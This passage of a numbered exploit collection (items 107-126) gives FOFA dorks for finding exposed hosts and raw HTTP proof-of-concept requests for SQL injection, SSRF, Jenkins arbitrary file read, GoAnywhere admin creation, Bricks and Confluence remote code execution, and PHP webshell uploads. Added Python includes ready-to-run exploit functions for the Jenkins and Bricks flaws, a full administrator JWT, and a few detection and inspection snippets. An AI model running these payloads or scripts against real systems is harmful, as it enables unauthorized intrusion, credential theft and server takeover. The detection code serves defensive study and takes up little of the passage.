User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close

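The Blade-Auth header in the two SpringBlade requests above is a JWT. As an added check that is not part of the page, the Python below decodes its header and claims without verifying the signature and reports what a reviewer wants to know before reusing or blocking such a token: the algorithm, the role it carries, and how long it is valid. The token embedded here is the one printed in request 106 (a public PoC token, used as a fixture); the role names and lifetime threshold are assumptions for the check.

```python
import base64
import json
import time

# The Blade-Auth value from request 106 above, used as a fixture.
BLADE_AUTH = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A"


def _b64url(segment):
    """base64url without padding, as JWS uses it."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token):
    """Decode header and claims of a compact JWS. No signature check: inspection only."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a three-part compact JWS")
    header = json.loads(_b64url(parts[0]))
    claims = json.loads(_b64url(parts[1]))
    return header, claims, parts[2]


def assess_jwt(token, now=None, max_lifetime=24 * 3600, privileged_roles=("administrator",)):
    """Flags: alg=none, missing exp, lifetime above max_lifetime (assumed 24h),
    still valid at `now`, and a privileged role_name (assumed role names)."""
    header, claims, _sig = decode_jwt(token)
    now = time.time() if now is None else now
    flags = []
    if str(header.get("alg", "")).lower() == "none":
        flags.append("alg=none")
    exp, nbf = claims.get("exp"), claims.get("nbf")
    if exp is None:
        flags.append("no-exp")
    else:
        lifetime = exp - (nbf if nbf is not None else now)
        if lifetime > max_lifetime:
            flags.append("lifetime=%dd" % (lifetime // 86400))
        flags.append("expired" if exp <= now else "valid")
    if claims.get("role_name") in privileged_roles:
        flags.append("role=%s" % claims["role_name"])
    return header, claims, flags
```

For this token the check reports an HS512 administrator token issued with a validity of more than three years; a token like that in a public PoC is a credential, and the tenant_id/account claims tell a defender exactly which account to rotate.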
108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
The CLI endpoint is driven with two POST requests sharing one Session id: one with Side: upload carrying the command frames, one with Side: download that returns the output. The body below is shown in Python bytes notation; send the raw 57 bytes. It runs help @/etc/passwd: the args4j parser expands @file into the file's lines, and the lines come back in the error and usage text.

POST /cli?remoting=false HTTP/1.1
Host:
Content-Type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 57

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The download side returns the first line of the file as the "default" of the COMMAND argument and the second line in the "Too many arguments" error:

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

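The byte string in the upload request above is the frame format of Jenkins' PlainCLIProtocol: a 4-byte big-endian length, a 1-byte opcode, then the data, with strings written the way Java's DataOutputStream.writeUTF does (2-byte length prefix). The Python below is an added example, not the page's or Jenkins' own code: it builds that frame sequence for arbitrary arguments (and reproduces the page's 57 bytes exactly), splits a server stream back into frames, and pulls the leaked lines out of the args4j error and usage text. run_cli() performs the live exchange: the download side is opened first and kept open, then the upload side is sent with the same Session id (that ordering is what the PoC tooling does; the response framing with STDOUT/STDERR/EXIT opcodes is assumed to mirror the request framing). SAMPLE_RESPONSE is a constructed stream carrying the response text shown above, so the parser can be tested offline.

```python
import http.client
import re
import struct
import threading
import time
import urllib.parse
import uuid

# Opcodes of Jenkins' PlainCLIProtocol, in enum ordinal order.
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3
OP_EXIT, OP_STDIN, OP_END_STDIN, OP_STDOUT, OP_STDERR = 4, 5, 6, 7, 8

# The upload body from the request above, for comparison.
PAGE_BYTES = (b"\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
              b"\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03")


def frame(op, data=b""):
    """One frame: 4-byte big-endian length of data, 1-byte opcode, data."""
    return struct.pack(">IB", len(data), op) + data


def java_utf(text):
    """DataOutputStream.writeUTF(): 2-byte length prefix + (modified) UTF-8; same as UTF-8 for ASCII."""
    raw = text.encode("utf-8")
    return struct.pack(">H", len(raw)) + raw


def build_cli_request(args, encoding="GBK", locale="en_US"):
    """Client frames for `jenkins-cli <args>`. An argument starting with '@' is expanded by
    args4j into the lines of that file, which is the file-read primitive of CVE-2024-23897."""
    body = b"".join(frame(OP_ARG, java_utf(a)) for a in args)
    body += frame(OP_ENCODING, java_utf(encoding))
    body += frame(OP_LOCALE, java_utf(locale))
    body += frame(OP_START)
    return body


def parse_frames(stream):
    """Split a stream into (opcode, data) frames; stops at a truncated frame."""
    frames, pos = [], 0
    while pos + 5 <= len(stream):
        length, op = struct.unpack(">IB", stream[pos:pos + 5])
        data = stream[pos + 5:pos + 5 + length]
        if len(data) < length:
            break
        frames.append((op, data))
        pos += 5 + length
    return frames


LEAK_PATTERNS = (re.compile(r"Too many arguments: (.*)$"),
                 re.compile(r"\(default: (.*)\)\s*$"))


def leaked_lines(stream):
    """File lines that args4j echoes back: the excess argument in its error, and the
    first line as the 'default' value in the usage text."""
    text = b"".join(d for op, d in parse_frames(stream) if op in (OP_STDOUT, OP_STDERR))
    found = []
    for line in text.decode("utf-8", "replace").splitlines():
        for pat in LEAK_PATTERNS:
            m = pat.search(line)
            if m:
                found.append(m.group(1))
    return found


def run_cli(base_url, args, timeout=15):
    """Live exchange against a Jenkins base URL (e.g. http://host:8080 or http://host/jenkins)."""
    u = urllib.parse.urlsplit(base_url)
    conn = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    path = u.path.rstrip("/") + "/cli?remoting=false"
    session, out = str(uuid.uuid4()), {}

    def download():
        c = conn(u.netloc, timeout=timeout)
        c.request("POST", path, body=b"", headers={"Session": session, "Side": "download"})
        out["body"] = c.getresponse().read()

    t = threading.Thread(target=download)
    t.start()
    time.sleep(0.5)                      # let the download side register first
    c = conn(u.netloc, timeout=timeout)
    c.request("POST", path, body=build_cli_request(args),
              headers={"Session": session, "Side": "upload",
                       "Content-Type": "application/octet-stream"})
    c.getresponse().read()
    t.join(timeout)
    return leaked_lines(out.get("body", b""))


# Constructed server stream carrying the response text shown on the page above.
SAMPLE_RESPONSE = (
    frame(OP_STDERR, b"ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
    + frame(OP_STDOUT, b"java -jar jenkins-cli.jar help\n [COMMAND]\n"
                       b"Lists all the available commands or a detailed description of single command.\n"
                       b" COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)\n")
    + frame(OP_EXIT, struct.pack(">I", 2))
)
```

Only the first two lines of a file come back through help; other commands with more positional arguments, or that echo their arguments, leak more, which is why the fix in Jenkins 2.442 / LTS 2.426.3 disables the @file expansion entirely rather than patching individual commands.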
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
The ..;/ segment bypasses the path check and exposes the initial setup wizard, which creates an administrator account.

GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 remote code execution
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce value from the front page.

GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: put that nonce into the request below and execute the command. The queryEditor program runs id, captures its output and throws it as the exception message, so the output comes back in the response.

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

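The two steps above, as an added Python example (not code from the page or from the Bricks project): step 1 fetches the front page and extracts the REST nonce, step 2 posts the render_element request with that nonce and the same queryEditor program. The nonce location is an assumption: Bricks is taken to print it in its inline bricksData script as "nonce":"<hex>", so check the target's HTML if the regex finds nothing. SAMPLE_HOMEPAGE is a constructed fragment for the offline test; run() is the live sequence.

```python
import json
import re
import urllib.error
import urllib.request

# Assumption: the REST nonce appears in the front page's inline bricksData script
# as "nonce":"<hex>" (hypothetical pattern; verify against the target's HTML).
NONCE_RE = re.compile(r'"nonce"\s*:\s*"([0-9a-f]+)"')

# Constructed front-page fragment for the offline test (not a real site's HTML).
SAMPLE_HOMEPAGE = (
    '<html><head><script id="bricks-scripts-js-extra">'
    'var bricksData = {"ajaxUrl":"https:\\/\\/x.x.x.x\\/wp-admin\\/admin-ajax.php",'
    '"restApiUrl":"https:\\/\\/x.x.x.x\\/wp-json\\/bricks\\/v1\\/","nonce":"8f3c1a2b9d"};'
    '</script></head><body></body></html>'
)


def extract_nonce(html):
    """Step 1: the nonce the render_element endpoint checks."""
    m = NONCE_RE.search(html)
    return m.group(1) if m else None


def php_capture(cmd):
    """The queryEditor program from the PoC: run cmd, capture its output, throw it as the message."""
    return ("ob_start();echo `%s`;$output=ob_get_contents();ob_end_clean();"
            "throw new Exception($output);" % cmd)


def render_element_body(nonce, cmd, post_id="1"):
    """Step 2 body: the element structure from the PoC with the nonce and program filled in."""
    return json.dumps({
        "postId": post_id,
        "nonce": nonce,
        "element": {
            "name": "container",
            "settings": {
                "hasLoop": "true",
                "query": {"useQueryEditor": True, "queryEditor": php_capture(cmd), "objectType": "post"},
            },
        },
    })


def run(base_url, cmd="id", timeout=15):
    """Live sequence: GET / for the nonce, then POST render_element; returns the response text."""
    html = urllib.request.urlopen(base_url, timeout=timeout).read().decode("utf-8", "replace")
    nonce = extract_nonce(html)
    if nonce is None:
        raise RuntimeError("no nonce found: not Bricks, or the page layout differs from the assumption")
    req = urllib.request.Request(base_url.rstrip("/") + "/wp-json/bricks/v1/render_element",
                                 data=render_element_body(nonce, cmd).encode(),
                                 headers={"Content-Type": "application/json"}, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")   # the thrown message travels in the error body
```

The nonce is the only thing standing between an anonymous visitor and the eval of queryEditor, and it is handed out on the front page; that is why the fix in 1.9.6.1 added a capability check rather than a stronger nonce.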
116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
The request goes through wp-admin, so it needs a logged-in session cookie.

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

The txt_path field sets the destination, so the webshell lands at /home/src.php; request that path afterwards.

119. Beijing Byzoro Smart S20 management platform sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.

POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

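The SQL injection PoCs above (105, 106, 107, 111, 112, 114, 117 and 119) share one detection-relevant trait: the payload is a time-based or error-based expression (sleep, updatexml, benchmark) placed in a query string, a form field, a JSON field, and in the SpringBlade requests in the parameter name itself rather than a value, which is what value-only WAF rules miss. The Python below is an added example, not code from the page or from any of the products: it parses a request line plus body into parameters, checks both names and values, also tries values that are base64-wrapped SQL (a statement such as select 1,database(),version() hidden in a base64 parameter), and is run over constructed copies of the page's own request lines plus benign traffic. The regex is deliberately narrow so it can be dropped into a log review without drowning in false positives; extend it for your stack.

```python
import base64
import binascii
import json
import re
from urllib.parse import parse_qsl, urlsplit

SQLI_RE = re.compile(
    r"\b(?:sleep|benchmark|updatexml|extractvalue|database|version)\s*\("
    r"|\bunion\b[\s(]+(?:all\s+)?select\b"
    r"|\bselect\b.*\bfrom\b",
    re.I | re.S,
)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


def _maybe_base64(text):
    """Decode a value that looks like base64 and decodes to printable text; else None."""
    if not B64_RE.match(text):
        return None
    try:
        decoded = base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    return decoded if decoded.isprintable() else None


def request_params(request_line, body=""):
    """Yield (location, name, value) for query-string, form and top-level JSON parameters."""
    target = request_line.split(" ")[1]
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        yield "query", name, value
    body = body.strip()
    if not body:
        return
    if body.startswith("{"):
        try:
            obj = json.loads(body)
        except ValueError:
            obj = None
        if isinstance(obj, dict):
            for name, value in obj.items():
                yield "json", name, value if isinstance(value, str) else json.dumps(value)
            return
    for name, value in parse_qsl(body, keep_blank_values=True):
        yield "body", name, value


def sqli_findings(request_line, body=""):
    """(location, part, parameter, matched text). `part` is 'name' when the injection sits in
    the parameter name, 'value' or 'value-base64' otherwise."""
    findings = []
    for where, name, value in request_params(request_line, body):
        candidates = [("name", name), ("value", value)]
        decoded = _maybe_base64(value)
        if decoded is not None:
            candidates.append(("value-base64", decoded))
        for part, text in candidates:
            if SQLI_RE.search(text):
                findings.append((where, part, name, text))
    return findings


# Constructed samples: request lines/bodies copied from the PoCs above, plus benign traffic.
SAMPLES = {
    "springblade_name": ("GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1", ""),
    "h5vp_value": ("GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1", ""),
    "notificationx_json": ("POST /wp-json/notificationx/v1/analytics HTTP/1.1",
                           '{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}'),
    "smart_s20_form": ("POST /sysmanage/sysmanageajax.php HTTP/1.1",
                       "src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456"),
    "base64_wrapped": ("GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1", ""),
    "benign": ("GET /api/blade-system/dict-biz/list?code=sex&current=1&size=10 HTTP/1.1", ""),
    "benign_form": ("POST /sysmanage/sysmanageajax.php HTTP/1.1", "src=manageadmin&type=add&id=7&value=alice|Passw0rd"),
}


def scan(samples=SAMPLES):
    """Run the check over every sample; returns {sample: findings}."""
    return {key: sqli_findings(line, body) for key, (line, body) in samples.items()}
```

The springblade_name sample is the instructive one: the whole updatexml(...) expression is the key of the query string, so any rule that iterates over parameter values and never looks at keys reports nothing for the two SpringBlade list endpoints.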
120. Beijing Byzoro Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

Uploaded file path: /upload/2.php

121. Beijing Byzoro Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality testing system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user is created, log in to the backend directly; system commands can be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
